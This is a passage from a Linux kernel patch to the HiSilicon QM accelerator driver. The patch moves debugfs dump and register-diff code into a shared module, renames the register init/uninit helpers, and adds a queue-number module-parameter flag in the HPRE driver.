++	memset(sqe_curr + qm->debug.sqe_mask_offset, QM_SQE_ADDR_MASK,
++	       qm->debug.sqe_mask_len);
++
++	dump_show(qm, sqe_curr, qm->sqe_size, "SQE");
++
++	kfree(sqe);
++
++	return 0;
++}
++
++static int qm_cq_dump(struct hisi_qm *qm, char *s)
++{
++	struct qm_cqe *cqe_curr;
++	struct hisi_qp *qp;
++	u32 qp_id, cqe_id;
++	int ret;
++
++	ret = q_dump_param_parse(qm, s, &cqe_id, &qp_id, qm->qp_array->cq_depth);
++	if (ret)
++		return ret;
++
++	qp = &qm->qp_array[qp_id];
++	cqe_curr = qp->cqe + cqe_id;
++	dump_show(qm, cqe_curr, sizeof(struct qm_cqe), "CQE");
++
++	return 0;
++}
++
++static int qm_eq_aeq_dump(struct hisi_qm *qm, const char *s,
++			  size_t size, char *name)
++{
++	struct device *dev = &qm->pdev->dev;
++	void *xeqe;
++	u32 xeqe_id;
++	int ret;
++
++	if (!s)
++		return -EINVAL;
++
++	ret = kstrtou32(s, 0, &xeqe_id);
++	if (ret)
++		return -EINVAL;
++
++	if (!strcmp(name, "EQE") && xeqe_id >= qm->eq_depth) {
++		dev_err(dev, "Please input eqe num (0-%u)", qm->eq_depth - 1);
++		return -EINVAL;
++	} else if (!strcmp(name, "AEQE") && xeqe_id >= qm->aeq_depth) {
++		dev_err(dev, "Please input aeqe num (0-%u)", qm->eq_depth - 1);
++		return -EINVAL;
++	}
++
++	down_read(&qm->qps_lock);
++
++	if (qm->eqe && !strcmp(name, "EQE")) {
++		xeqe = qm->eqe + xeqe_id;
++	} else if (qm->aeqe && !strcmp(name, "AEQE")) {
++		xeqe = qm->aeqe + xeqe_id;
++	} else {
++		ret = -EINVAL;
++		goto err_unlock;
++	}
++
++	dump_show(qm, xeqe, size, name);
++
++err_unlock:
++	up_read(&qm->qps_lock);
++	return ret;
++}
++
++static int qm_dbg_help(struct hisi_qm *qm, char *s)
++{
++	struct device *dev = &qm->pdev->dev;
++
++	if (strsep(&s, " ")) {
++		dev_err(dev, "Please do not input extra characters!\n");
++		return -EINVAL;
++	}
++
++	dev_info(dev, "available commands:\n");
++	dev_info(dev, "sqc <num>\n");
++	dev_info(dev, "cqc <num>\n");
++	dev_info(dev, "eqc\n");
++	dev_info(dev, "aeqc\n");
++	dev_info(dev, "sq <num> <e>\n");
++	dev_info(dev, "cq <num> <e>\n");
++	dev_info(dev, "eq <e>\n");
++	dev_info(dev, "aeq <e>\n");
++
++	return 0;
++}
++
++static int qm_cmd_write_dump(struct hisi_qm *qm, const char *cmd_buf)
++{
++	struct device *dev = &qm->pdev->dev;
++	char *presult, *s, *s_tmp;
++	int ret;
++
++	s = kstrdup(cmd_buf, GFP_KERNEL);
++	if (!s)
++		return -ENOMEM;
++
++	s_tmp = s;
++	presult = strsep(&s, " ");
++	if (!presult) {
++		ret = -EINVAL;
++		goto err_buffer_free;
++	}
++
++	if (!strcmp(presult, "sqc"))
++		ret = qm_sqc_dump(qm, s);
++	else if (!strcmp(presult, "cqc"))
++		ret = qm_cqc_dump(qm, s);
++	else if (!strcmp(presult, "eqc"))
++		ret = qm_eqc_aeqc_dump(qm, s, sizeof(struct qm_eqc),
++				       QM_MB_CMD_EQC, "EQC");
++	else if (!strcmp(presult, "aeqc"))
++		ret = qm_eqc_aeqc_dump(qm, s, sizeof(struct qm_aeqc),
++				       QM_MB_CMD_AEQC, "AEQC");
++	else if (!strcmp(presult, "sq"))
++		ret = qm_sq_dump(qm, s);
++	else if (!strcmp(presult, "cq"))
++		ret = qm_cq_dump(qm, s);
++	else if (!strcmp(presult, "eq"))
++		ret = qm_eq_aeq_dump(qm, s, sizeof(struct qm_eqe), "EQE");
++	else if (!strcmp(presult, "aeq"))
++		ret = qm_eq_aeq_dump(qm, s, sizeof(struct qm_aeqe), "AEQE");
++	else if (!strcmp(presult, "help"))
++		ret = qm_dbg_help(qm, s);
++	else
++		ret = -EINVAL;
++
++	if (ret)
++		dev_info(dev, "Please echo help\n");
++
++err_buffer_free:
++	kfree(s_tmp);
++
++	return ret;
++}
++
++static ssize_t qm_cmd_write(struct file *filp, const char __user *buffer,
++			    size_t count, loff_t *pos)
++{
++	struct hisi_qm *qm = filp->private_data;
++	char *cmd_buf, *cmd_buf_tmp;
++	int ret;
++
++	if (*pos)
++		return 0;
++
++	ret = hisi_qm_get_dfx_access(qm);
++	if (ret)
++		return ret;
++
++	/* Judge if the instance is being reset. */
++	if (unlikely(atomic_read(&qm->status.flags) == QM_STOP)) {
++		ret = 0;
++		goto put_dfx_access;
++	}
++
++	if (count > QM_DBG_WRITE_LEN) {
++		ret = -ENOSPC;
++		goto put_dfx_access;
++	}
++
++	cmd_buf = memdup_user_nul(buffer, count);
++	if (IS_ERR(cmd_buf)) {
++		ret = PTR_ERR(cmd_buf);
++		goto put_dfx_access;
++	}
++
++	cmd_buf_tmp = strchr(cmd_buf, '\n');
++	if (cmd_buf_tmp) {
++		*cmd_buf_tmp = '\0';
++		count = cmd_buf_tmp - cmd_buf + 1;
++	}
++
++	ret = qm_cmd_write_dump(qm, cmd_buf);
++	if (ret) {
++		kfree(cmd_buf);
++		goto put_dfx_access;
++	}
++
++	kfree(cmd_buf);
++
++	ret = count;
++
++put_dfx_access:
++	hisi_qm_put_dfx_access(qm);
++	return ret;
++}
++
++static const struct file_operations qm_cmd_fops = {
++	.owner = THIS_MODULE,
++	.open = simple_open,
++	.read = qm_cmd_read,
++	.write = qm_cmd_write,
++};
++
++/**
++ * hisi_qm_regs_dump() - Dump registers's value.
++ * @s: debugfs file handle.
++ * @regset: accelerator registers information.
++ *
++ * Dump accelerator registers.
++ */
++void hisi_qm_regs_dump(struct seq_file *s, struct debugfs_regset32 *regset)
++{
++	struct pci_dev *pdev = to_pci_dev(regset->dev);
++	struct hisi_qm *qm = pci_get_drvdata(pdev);
++	const struct debugfs_reg32 *regs = regset->regs;
++	int regs_len = regset->nregs;
++	int i, ret;
++	u32 val;
++
++	ret = hisi_qm_get_dfx_access(qm);
++	if (ret)
++		return;
++
++	for (i = 0; i < regs_len; i++) {
++		val = readl(regset->base + regs[i].offset);
++		seq_printf(s, "%s= 0x%08x\n", regs[i].name, val);
++	}
++
++	hisi_qm_put_dfx_access(qm);
++}
++EXPORT_SYMBOL_GPL(hisi_qm_regs_dump);
++
++static int qm_regs_show(struct seq_file *s, void *unused)
++{
++	struct hisi_qm *qm = s->private;
++	struct debugfs_regset32 regset;
++
++	if (qm->fun_type == QM_HW_PF) {
++		regset.regs = qm_dfx_regs;
++		regset.nregs = ARRAY_SIZE(qm_dfx_regs);
++	} else {
++		regset.regs = qm_vf_dfx_regs;
++		regset.nregs = ARRAY_SIZE(qm_vf_dfx_regs);
++	}
++
++	regset.base = qm->io_base;
++	regset.dev = &qm->pdev->dev;
++
++	hisi_qm_regs_dump(s, &regset);
++
++	return 0;
++}
++
++DEFINE_SHOW_ATTRIBUTE(qm_regs);
++
++static u32 current_q_read(struct hisi_qm *qm)
++{
++	return readl(qm->io_base + QM_DFX_SQE_CNT_VF_SQN) >> QM_DFX_QN_SHIFT;
++}
++
++static int current_q_write(struct hisi_qm *qm, u32 val)
++{
++	u32 tmp;
++
++	if (val >= qm->debug.curr_qm_qp_num)
++		return -EINVAL;
++
++	tmp = val << QM_DFX_QN_SHIFT |
++	      (readl(qm->io_base + QM_DFX_SQE_CNT_VF_SQN) & CURRENT_FUN_MASK);
++	writel(tmp, qm->io_base + QM_DFX_SQE_CNT_VF_SQN);
++
++	tmp = val << QM_DFX_QN_SHIFT |
++	      (readl(qm->io_base + QM_DFX_CQE_CNT_VF_CQN) & CURRENT_FUN_MASK);
++	writel(tmp, qm->io_base + QM_DFX_CQE_CNT_VF_CQN);
++
++	return 0;
++}
++
++static u32 clear_enable_read(struct hisi_qm *qm)
++{
++	return readl(qm->io_base + QM_DFX_CNT_CLR_CE);
++}
++
++/* rd_clr_ctrl 1 enable read clear, otherwise 0 disable it */
++static int clear_enable_write(struct hisi_qm *qm, u32 rd_clr_ctrl)
++{
++	if (rd_clr_ctrl > 1)
++		return -EINVAL;
++
++	writel(rd_clr_ctrl, qm->io_base + QM_DFX_CNT_CLR_CE);
++
++	return 0;
++}
++
++static u32 current_qm_read(struct hisi_qm *qm)
++{
++	return readl(qm->io_base + QM_DFX_MB_CNT_VF);
++}
++
++static int qm_get_vf_qp_num(struct hisi_qm *qm, u32 fun_num)
++{
++	u32 remain_q_num, vfq_num;
++	u32 num_vfs = qm->vfs_num;
++
++	vfq_num = (qm->ctrl_qp_num - qm->qp_num) / num_vfs;
++	if (vfq_num >= qm->max_qp_num)
++		return qm->max_qp_num;
++
++	remain_q_num = (qm->ctrl_qp_num - qm->qp_num) % num_vfs;
++	if (vfq_num + remain_q_num <= qm->max_qp_num)
++		return fun_num == num_vfs ? vfq_num + remain_q_num : vfq_num;
++
++	/*
++	 * if vfq_num + remain_q_num > max_qp_num, the last VFs,
++	 * each with one more queue.
++	 */
++	return fun_num + remain_q_num > num_vfs ? vfq_num + 1 : vfq_num;
++}
++
++static int current_qm_write(struct hisi_qm *qm, u32 val)
++{
++	u32 tmp;
++
++	if (val > qm->vfs_num)
++		return -EINVAL;
++
++	/* According PF or VF Dev ID to calculation curr_qm_qp_num and store */
++	if (!val)
++		qm->debug.curr_qm_qp_num = qm->qp_num;
++	else
++		qm->debug.curr_qm_qp_num = qm_get_vf_qp_num(qm, val);
++
++	writel(val, qm->io_base + QM_DFX_MB_CNT_VF);
++	writel(val, qm->io_base + QM_DFX_DB_CNT_VF);
++
++	tmp = val |
++	      (readl(qm->io_base + QM_DFX_SQE_CNT_VF_SQN) & CURRENT_Q_MASK);
++	writel(tmp, qm->io_base + QM_DFX_SQE_CNT_VF_SQN);
++
++	tmp = val |
++	      (readl(qm->io_base + QM_DFX_CQE_CNT_VF_CQN) & CURRENT_Q_MASK);
++	writel(tmp, qm->io_base + QM_DFX_CQE_CNT_VF_CQN);
++
++	return 0;
++}
++
++static ssize_t qm_debug_read(struct file *filp, char __user *buf,
++			     size_t count, loff_t *pos)
++{
++	struct debugfs_file *file = filp->private_data;
++	enum qm_debug_file index = file->index;
++	struct hisi_qm *qm = file_to_qm(file);
++	char tbuf[QM_DBG_TMP_BUF_LEN];
++	u32 val;
++	int ret;
++
++	ret = hisi_qm_get_dfx_access(qm);
++	if (ret)
++		return ret;
++
++	mutex_lock(&file->lock);
++	switch (index) {
++	case CURRENT_QM:
++		val = current_qm_read(qm);
++		break;
++	case CURRENT_Q:
++		val = current_q_read(qm);
++		break;
++	case CLEAR_ENABLE:
++		val = clear_enable_read(qm);
++		break;
++	default:
++		goto err_input;
++	}
++	mutex_unlock(&file->lock);
++
++	hisi_qm_put_dfx_access(qm);
++	ret = scnprintf(tbuf, QM_DBG_TMP_BUF_LEN, "%u\n", val);
++	return simple_read_from_buffer(buf, count, pos, tbuf, ret);
++
++err_input:
++	mutex_unlock(&file->lock);
++	hisi_qm_put_dfx_access(qm);
++	return -EINVAL;
++}
++
++static ssize_t qm_debug_write(struct file *filp, const char __user *buf,
++			      size_t count, loff_t *pos)
++{
++	struct debugfs_file *file = filp->private_data;
++	enum qm_debug_file index = file->index;
++	struct hisi_qm *qm = file_to_qm(file);
++	unsigned long val;
++	char tbuf[QM_DBG_TMP_BUF_LEN];
++	int len, ret;
++
++	if (*pos != 0)
++		return 0;
++
++	if (count >= QM_DBG_TMP_BUF_LEN)
++		return -ENOSPC;
++
++	len = simple_write_to_buffer(tbuf, QM_DBG_TMP_BUF_LEN - 1, pos, buf,
++				     count);
++	if (len < 0)
++		return len;
++
++	tbuf[len] = '\0';
++	if (kstrtoul(tbuf, 0, &val))
++		return -EFAULT;
++
++	ret = hisi_qm_get_dfx_access(qm);
++	if (ret)
++		return ret;
++
++	mutex_lock(&file->lock);
++	switch (index) {
++	case CURRENT_QM:
++		ret = current_qm_write(qm, val);
++		break;
++	case CURRENT_Q:
++		ret = current_q_write(qm, val);
++		break;
++	case CLEAR_ENABLE:
++		ret = clear_enable_write(qm, val);
++		break;
++	default:
++		ret = -EINVAL;
++	}
++	mutex_unlock(&file->lock);
++
++	hisi_qm_put_dfx_access(qm);
++
++	if (ret)
++		return ret;
++
++	return count;
++}
++
++static const struct file_operations qm_debug_fops = {
++	.owner = THIS_MODULE,
++	.open = simple_open,
++	.read = qm_debug_read,
++	.write = qm_debug_write,
++};
++
++static void dfx_regs_uninit(struct hisi_qm *qm,
++		struct dfx_diff_registers *dregs, int reg_len)
++{
++	int i;
++
++	/* Setting the pointer is NULL to prevent double free */
++	for (i = 0; i < reg_len; i++) {
++		kfree(dregs[i].regs);
++		dregs[i].regs = NULL;
++	}
++	kfree(dregs);
++}
++
++static struct dfx_diff_registers *dfx_regs_init(struct hisi_qm *qm,
++	const struct dfx_diff_registers *cregs, u32 reg_len)
++{
++	struct dfx_diff_registers *diff_regs;
++	u32 j, base_offset;
++	int i;
++
++	diff_regs = kcalloc(reg_len, sizeof(*diff_regs), GFP_KERNEL);
++	if (!diff_regs)
++		return ERR_PTR(-ENOMEM);
++
++	for (i = 0; i < reg_len; i++) {
++		if (!cregs[i].reg_len)
++			continue;
++
++		diff_regs[i].reg_offset = cregs[i].reg_offset;
++		diff_regs[i].reg_len = cregs[i].reg_len;
++		diff_regs[i].regs = kcalloc(QM_DFX_REGS_LEN, cregs[i].reg_len,
++					 GFP_KERNEL);
++		if (!diff_regs[i].regs)
++			goto alloc_error;
++
++		for (j = 0; j < diff_regs[i].reg_len; j++) {
++			base_offset = diff_regs[i].reg_offset +
++					j * QM_DFX_REGS_LEN;
++			diff_regs[i].regs[j] = readl(qm->io_base + base_offset);
++		}
++	}
++
++	return diff_regs;
++
++alloc_error:
++	while (i > 0) {
++		i--;
++		kfree(diff_regs[i].regs);
++	}
++	kfree(diff_regs);
++	return ERR_PTR(-ENOMEM);
++}
++
++static int qm_diff_regs_init(struct hisi_qm *qm,
++		struct dfx_diff_registers *dregs, u32 reg_len)
++{
++	qm->debug.qm_diff_regs = dfx_regs_init(qm, qm_diff_regs, ARRAY_SIZE(qm_diff_regs));
++	if (IS_ERR(qm->debug.qm_diff_regs))
++		return PTR_ERR(qm->debug.qm_diff_regs);
++
++	qm->debug.acc_diff_regs = dfx_regs_init(qm, dregs, reg_len);
++	if (IS_ERR(qm->debug.acc_diff_regs)) {
++		dfx_regs_uninit(qm, qm->debug.qm_diff_regs, ARRAY_SIZE(qm_diff_regs));
++		return PTR_ERR(qm->debug.acc_diff_regs);
++	}
++
++	return 0;
++}
++
++static void qm_last_regs_uninit(struct hisi_qm *qm)
++{
++	struct qm_debug *debug = &qm->debug;
++
++	if (qm->fun_type == QM_HW_VF || !debug->qm_last_words)
++		return;
++
++	kfree(debug->qm_last_words);
++	debug->qm_last_words = NULL;
++}
++
++static int qm_last_regs_init(struct hisi_qm *qm)
++{
++	int dfx_regs_num = ARRAY_SIZE(qm_dfx_regs);
++	struct qm_debug *debug = &qm->debug;
++	int i;
++
++	if (qm->fun_type == QM_HW_VF)
++		return 0;
++
++	debug->qm_last_words = kcalloc(dfx_regs_num, sizeof(unsigned int), GFP_KERNEL);
++	if (!debug->qm_last_words)
++		return -ENOMEM;
++
++	for (i = 0; i < dfx_regs_num; i++) {
++		debug->qm_last_words[i] = readl_relaxed(qm->io_base +
++			qm_dfx_regs[i].offset);
++	}
++
++	return 0;
++}
++
++static void qm_diff_regs_uninit(struct hisi_qm *qm, u32 reg_len)
++{
++	dfx_regs_uninit(qm, qm->debug.acc_diff_regs, reg_len);
++	dfx_regs_uninit(qm, qm->debug.qm_diff_regs, ARRAY_SIZE(qm_diff_regs));
++}
++
++/**
++ * hisi_qm_regs_debugfs_init() - Allocate memory for registers.
++ * @qm: device qm handle.
++ * @dregs: diff registers handle.
++ * @reg_len: diff registers region length.
++ */
++int hisi_qm_regs_debugfs_init(struct hisi_qm *qm,
++		struct dfx_diff_registers *dregs, u32 reg_len)
++{
++	int ret;
++
++	if (!qm || !dregs)
++		return -EINVAL;
++
++	if (qm->fun_type != QM_HW_PF)
++		return 0;
++
++	ret = qm_last_regs_init(qm);
++	if (ret) {
++		dev_info(&qm->pdev->dev, "failed to init qm words memory!\n");
++		return ret;
++	}
++
++	ret = qm_diff_regs_init(qm, dregs, reg_len);
++	if (ret) {
++		qm_last_regs_uninit(qm);
++		return ret;
++	}
++
++	return 0;
++}
++EXPORT_SYMBOL_GPL(hisi_qm_regs_debugfs_init);
++
++/**
++ * hisi_qm_regs_debugfs_uninit() - Free memory for registers.
++ * @qm: device qm handle.
++ * @reg_len: diff registers region length.
++ */
++void hisi_qm_regs_debugfs_uninit(struct hisi_qm *qm, u32 reg_len)
++{
++	if (!qm || qm->fun_type != QM_HW_PF)
++		return;
++
++	qm_diff_regs_uninit(qm, reg_len);
++	qm_last_regs_uninit(qm);
++}
++EXPORT_SYMBOL_GPL(hisi_qm_regs_debugfs_uninit);
++
++/**
++ * hisi_qm_acc_diff_regs_dump() - Dump registers's value.
++ * @qm: device qm handle.
++ * @s: Debugfs file handle.
++ * @dregs: diff registers handle.
++ * @regs_len: diff registers region length.
++ */
++void hisi_qm_acc_diff_regs_dump(struct hisi_qm *qm, struct seq_file *s,
++	struct dfx_diff_registers *dregs, u32 regs_len)
++{
++	u32 j, val, base_offset;
++	int i, ret;
++
++	if (!qm || !s || !dregs)
++		return;
++
++	ret = hisi_qm_get_dfx_access(qm);
++	if (ret)
++		return;
++
++	down_read(&qm->qps_lock);
++	for (i = 0; i < regs_len; i++) {
++		if (!dregs[i].reg_len)
++			continue;
++
++		for (j = 0; j < dregs[i].reg_len; j++) {
++			base_offset = dregs[i].reg_offset + j * QM_DFX_REGS_LEN;
++			val = readl(qm->io_base + base_offset);
++			if (val != dregs[i].regs[j])
++				seq_printf(s, "0x%08x = 0x%08x ---> 0x%08x\n",
++					   base_offset, dregs[i].regs[j], val);
++		}
++	}
++	up_read(&qm->qps_lock);
++
++	hisi_qm_put_dfx_access(qm);
++}
++EXPORT_SYMBOL_GPL(hisi_qm_acc_diff_regs_dump);
++
++void hisi_qm_show_last_dfx_regs(struct hisi_qm *qm)
++{
++	struct qm_debug *debug = &qm->debug;
++	struct pci_dev *pdev = qm->pdev;
++	u32 val;
++	int i;
++
++	if (qm->fun_type == QM_HW_VF || !debug->qm_last_words)
++		return;
++
++	for (i = 0; i < ARRAY_SIZE(qm_dfx_regs); i++) {
++		val = readl_relaxed(qm->io_base + qm_dfx_regs[i].offset);
++		if (debug->qm_last_words[i] != val)
++			pci_info(pdev, "%s \t= 0x%08x => 0x%08x\n",
++			qm_dfx_regs[i].name, debug->qm_last_words[i], val);
++	}
++}
++
++static int qm_diff_regs_show(struct seq_file *s, void *unused)
++{
++	struct hisi_qm *qm = s->private;
++
++	hisi_qm_acc_diff_regs_dump(qm, s, qm->debug.qm_diff_regs,
++					ARRAY_SIZE(qm_diff_regs));
++
++	return 0;
++}
++DEFINE_SHOW_ATTRIBUTE(qm_diff_regs);
++
++static ssize_t qm_status_read(struct file *filp, char __user *buffer,
++			      size_t count, loff_t *pos)
++{
++	struct hisi_qm *qm = filp->private_data;
++	char buf[QM_DBG_READ_LEN];
++	int val, len;
++
++	val = atomic_read(&qm->status.flags);
++	len = scnprintf(buf, QM_DBG_READ_LEN, "%s\n", qm_s[val]);
++
++	return simple_read_from_buffer(buffer, count, pos, buf, len);
++}
++
++static const struct file_operations qm_status_fops = {
++	.owner = THIS_MODULE,
++	.open = simple_open,
++	.read = qm_status_read,
++};
++
++static void qm_create_debugfs_file(struct hisi_qm *qm, struct dentry *dir,
++				   enum qm_debug_file index)
++{
++	struct debugfs_file *file = qm->debug.files + index;
++
++	debugfs_create_file(qm_debug_file_name[index], 0600, dir, file,
++			    &qm_debug_fops);
++
++	file->index = index;
++	mutex_init(&file->lock);
++	file->debug = &qm->debug;
++}
++
++static int qm_debugfs_atomic64_set(void *data, u64 val)
++{
++	if (val)
++		return -EINVAL;
++
++	atomic64_set((atomic64_t *)data, 0);
++
++	return 0;
++}
++
++static int qm_debugfs_atomic64_get(void *data, u64 *val)
++{
++	*val = atomic64_read((atomic64_t *)data);
++
++	return 0;
++}
++
++DEFINE_DEBUGFS_ATTRIBUTE(qm_atomic64_ops, qm_debugfs_atomic64_get,
++			 qm_debugfs_atomic64_set, "%llu\n");
++
++/**
++ * hisi_qm_debug_init() - Initialize qm related debugfs files.
++ * @qm: The qm for which we want to add debugfs files.
++ *
++ * Create qm related debugfs files.
++ */
++void hisi_qm_debug_init(struct hisi_qm *qm)
++{
++	struct dfx_diff_registers *qm_regs = qm->debug.qm_diff_regs;
++	struct qm_dfx *dfx = &qm->debug.dfx;
++	struct dentry *qm_d;
++	void *data;
++	int i;
++
++	qm_d = debugfs_create_dir("qm", qm->debug.debug_root);
++	qm->debug.qm_d = qm_d;
++
++	/* only show this in PF */
++	if (qm->fun_type == QM_HW_PF) {
++		qm_create_debugfs_file(qm, qm->debug.debug_root, CURRENT_QM);
++		for (i = CURRENT_Q; i < DEBUG_FILE_NUM; i++)
++			qm_create_debugfs_file(qm, qm->debug.qm_d, i);
++	}
++
++	if (qm_regs)
++		debugfs_create_file("diff_regs", 0444, qm->debug.qm_d,
++					qm, &qm_diff_regs_fops);
++
++	debugfs_create_file("regs", 0444, qm->debug.qm_d, qm, &qm_regs_fops);
++
++	debugfs_create_file("cmd", 0600, qm->debug.qm_d, qm, &qm_cmd_fops);
++
++	debugfs_create_file("status", 0444, qm->debug.qm_d, qm,
++			&qm_status_fops);
++	for (i = 0; i < ARRAY_SIZE(qm_dfx_files); i++) {
++		data = (atomic64_t *)((uintptr_t)dfx + qm_dfx_files[i].offset);
++		debugfs_create_file(qm_dfx_files[i].name,
++			0644,
++			qm_d,
++			data,
++			&qm_atomic64_ops);
++	}
++
++	if (test_bit(QM_SUPPORT_FUNC_QOS, &qm->caps))
++		hisi_qm_set_algqos_init(qm);
++}
++EXPORT_SYMBOL_GPL(hisi_qm_debug_init);
++
++/**
++ * hisi_qm_debug_regs_clear() - clear qm debug related registers.
++ * @qm: The qm for which we want to clear its debug registers.
++ */
++void hisi_qm_debug_regs_clear(struct hisi_qm *qm)
++{
++	const struct debugfs_reg32 *regs;
++	int i;
++
++	/* clear current_qm */
++	writel(0x0, qm->io_base + QM_DFX_MB_CNT_VF);
++	writel(0x0, qm->io_base + QM_DFX_DB_CNT_VF);
++
++	/* clear current_q */
++	writel(0x0, qm->io_base + QM_DFX_SQE_CNT_VF_SQN);
++	writel(0x0, qm->io_base + QM_DFX_CQE_CNT_VF_CQN);
++
++	/*
++	 * these registers are reading and clearing, so clear them after
++	 * reading them.
++	 */
++	writel(0x1, qm->io_base + QM_DFX_CNT_CLR_CE);
++
++	regs = qm_dfx_regs;
++	for (i = 0; i < CNT_CYC_REGS_NUM; i++) {
++		readl(qm->io_base + regs->offset);
++		regs++;
++	}
++
++	/* clear clear_enable */
++	writel(0x0, qm->io_base + QM_DFX_CNT_CLR_CE);
++}
++EXPORT_SYMBOL_GPL(hisi_qm_debug_regs_clear);
+diff --git a/drivers/crypto/hisilicon/hpre/hpre_main.c b/drivers/crypto/hisilicon/hpre/hpre_main.c
+index baf1faec7046f..ff8a5f20a5df0 100644
+--- a/drivers/crypto/hisilicon/hpre/hpre_main.c
++++ b/drivers/crypto/hisilicon/hpre/hpre_main.c
+@@ -431,8 +431,11 @@ static u32 uacce_mode = UACCE_MODE_NOUACCE;
+ module_param_cb(uacce_mode, &hpre_uacce_mode_ops, &uacce_mode, 0444);
+ MODULE_PARM_DESC(uacce_mode, UACCE_MODE_DESC);
+ 
++static bool pf_q_num_flag;
+ static int pf_q_num_set(const char *val, const struct kernel_param *kp)
+ {
++	pf_q_num_flag = true;
++
+ 	return q_num_set(val, kp, PCI_DEVICE_ID_HUAWEI_HPRE_PF);
+ }
+ 
+@@ -1031,7 +1034,7 @@ static int hpre_cluster_debugfs_init(struct hisi_qm *qm)
+ 
+ 	for (i = 0; i < clusters_num; i++) {
+ 		ret = snprintf(buf, HPRE_DBGFS_VAL_MAX_LEN, "cluster%d", i);
+-		if (ret < 0)
++		if (ret >= HPRE_DBGFS_VAL_MAX_LEN)
+ 			return -EINVAL;
+ 		tmp_d = debugfs_create_dir(buf, qm->debug.debug_root);
+ 
+@@ -1101,8 +1104,7 @@ static int hpre_debugfs_init(struct hisi_qm *qm)
+ 
+ 	qm->debug.sqe_mask_offset = HPRE_SQE_MASK_OFFSET;
+ 	qm->debug.sqe_mask_len = HPRE_SQE_MASK_LEN;
+-	ret = hisi_qm_diff_regs_init(qm, hpre_diff_regs,
+-				ARRAY_SIZE(hpre_diff_regs));
++	ret = hisi_qm_regs_debugfs_init(qm, hpre_diff_regs, ARRAY_SIZE(hpre_diff_regs));
+ 	if (ret) {
+ 		dev_warn(dev, "Failed to init HPRE diff regs!\n");
+ 		goto debugfs_remove;
+@@ -1121,7 +1123,7 @@ static int hpre_debugfs_init(struct hisi_qm *qm)
+ 	return 0;
+ 
+ failed_to_create:
+-	hisi_qm_diff_regs_uninit(qm, ARRAY_SIZE(hpre_diff_regs));
++	hisi_qm_regs_debugfs_uninit(qm, ARRAY_SIZE(hpre_diff_regs));
+ debugfs_remove:
+ 	debugfs_remove_recursive(qm->debug.debug_root);
+ 	return ret;
+@@ -1129,7 +1131,7 @@ debugfs_remove:
+ 
+ static void hpre_debugfs_exit(struct hisi_qm *qm)
+ {
+-	hisi_qm_diff_regs_uninit(qm, ARRAY_SIZE(hpre_diff_regs));
++	hisi_qm_regs_debugfs_uninit(qm, ARRAY_SIZE(hpre_diff_regs));
+ 
+ 	debugfs_remove_recursive(qm->debug.debug_root);
+ }
+@@ -1156,6 +1158,8 @@ static int hpre_qm_init(struct hisi_qm *qm, struct pci_dev *pdev)
+ 		qm->qp_num = pf_q_num;
+ 		qm->debug.curr_qm_qp_num = pf_q_num;
+ 		qm->qm_list = &hpre_devices;
++		if (pf_q_num_flag)
++			set_bit(QM_MODULE_PARAM, &qm->misc_ctl);
+ 	}
+ 
+ 	ret = hisi_qm_init(qm);
+diff --git a/drivers/crypto/hisilicon/qm.c b/drivers/crypto/hisilicon/qm.c
+index 07e1e39a5e378..a4a3895c74181 100644
+--- a/drivers/crypto/hisilicon/qm.c
++++ b/drivers/crypto/hisilicon/qm.c
+@@ -16,6 +16,7 @@
+ #include <linux/uaccess.h>
+ #include <uapi/misc/uacce/hisi_qm.h>
+ #include <linux/hisi_acc_qm.h>
++#include "qm_common.h"
+ 
+ /* eq/aeq irq enable */
+ #define QM_VF_AEQ_INT_SOURCE		0x0
+@@ -119,8 +120,6 @@
+ #define QM_SQC_VFT_NUM_SHIFT_V2		45
+ #define QM_SQC_VFT_NUM_MASK_v2		GENMASK(9, 0)
+ 
+-#define QM_DFX_CNT_CLR_CE		0x100118
+-
+ #define QM_ABNORMAL_INT_SOURCE		0x100000
+ #define QM_ABNORMAL_INT_MASK		0x100004
+ #define QM_ABNORMAL_INT_MASK_VALUE	0x7fff
+@@ -187,14 +186,6 @@
+ #define QM_VF_RESET_WAIT_TIMEOUT_US    \
+ 	(QM_VF_RESET_WAIT_US * QM_VF_RESET_WAIT_CNT)
+ 
+-#define QM_DFX_MB_CNT_VF		0x104010
+-#define QM_DFX_DB_CNT_VF		0x104020
+-#define QM_DFX_SQE_CNT_VF_SQN		0x104030
+-#define QM_DFX_CQE_CNT_VF_CQN		0x104040
+-#define QM_DFX_QN_SHIFT			16
+-#define CURRENT_FUN_MASK		GENMASK(5, 0)
+-#define CURRENT_Q_MASK			GENMASK(31, 16)
+-
+ #define POLL_PERIOD			10
+ #define POLL_TIMEOUT			1000
+ #define WAIT_PERIOD_US_MAX		200
+@@ -211,19 +202,13 @@
+ #define QMC_ALIGN(sz)			ALIGN(sz, 32)
+ 
+ #define QM_DBG_READ_LEN		256
+-#define QM_DBG_WRITE_LEN		1024
+-#define QM_DBG_TMP_BUF_LEN		22
+ #define QM_PCI_COMMAND_INVALID		~0
+ #define QM_RESET_STOP_TX_OFFSET		1
+ #define QM_RESET_STOP_RX_OFFSET		2
+ 
+ #define WAIT_PERIOD			20
+ #define REMOVE_WAIT_DELAY		10
+-#define QM_SQE_ADDR_MASK		GENMASK(7, 0)
+ 
+-#define QM_DRIVER_REMOVING		0
+-#define QM_RST_SCHED			1
+-#define QM_RESETTING			2
+ #define QM_QOS_PARAM_NUM		2
+ #define QM_QOS_VAL_NUM			1
+ #define QM_QOS_BDF_PARAM_NUM		4
+@@ -250,15 +235,6 @@
+ #define QM_QOS_MIN_CIR_B		100
+ #define QM_QOS_MAX_CIR_U		6
+ #define QM_QOS_MAX_CIR_S		11
+-#define QM_DFX_BASE		0x0100000
+-#define QM_DFX_STATE1		0x0104000
+-#define QM_DFX_STATE2		0x01040C8
+-#define QM_DFX_COMMON		0x0000
+-#define QM_DFX_BASE_LEN		0x5A
+-#define QM_DFX_STATE1_LEN		0x2E
+-#define QM_DFX_STATE2_LEN		0x11
+-#define QM_DFX_COMMON_LEN		0xC3
+-#define QM_DFX_REGS_LEN		4UL
+ #define QM_AUTOSUSPEND_DELAY		3000
+ 
+ #define QM_MK_CQC_DW3_V1(hop_num, pg_sz, buf_sz, cqe_sz) \
+@@ -368,73 +344,6 @@ static const struct hisi_qm_cap_info qm_basic_info[] = {
+ 	{QM_VF_IRQ_NUM_CAP,     0x311c,   0,  GENMASK(15, 0), 0x1,       0x2,       0x3},
+ };
+ 
+-struct qm_cqe {
+-	__le32 rsvd0;
+-	__le16 cmd_id;
+-	__le16 rsvd1;
+-	__le16 sq_head;
+-	__le16 sq_num;
+-	__le16 rsvd2;
+-	__le16 w7;
+-};
+-
+-struct qm_eqe {
+-	__le32 dw0;
+-};
+-
